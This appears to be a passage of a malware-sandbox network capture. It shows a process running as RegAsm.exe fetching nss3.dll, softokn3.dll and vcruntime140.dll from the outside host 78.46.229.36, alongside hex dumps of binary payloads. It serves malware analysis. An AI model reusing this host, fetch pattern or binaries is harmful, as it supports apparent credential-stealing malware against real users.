2024-03-28 08:15:45 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49845	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:46 UTC	202	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:15:47 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:46 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-03-28 08:15:47 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49846	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:47 UTC	206	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:15:48 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:47 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-03-28 08:15:48 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-03-28 08:15:48 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49847	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:49 UTC	210	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:15:50 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:49 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-03-28 08:15:50 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-03-28 08:15:50 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-03-28 08:15:50 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-03-28 08:15:50 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 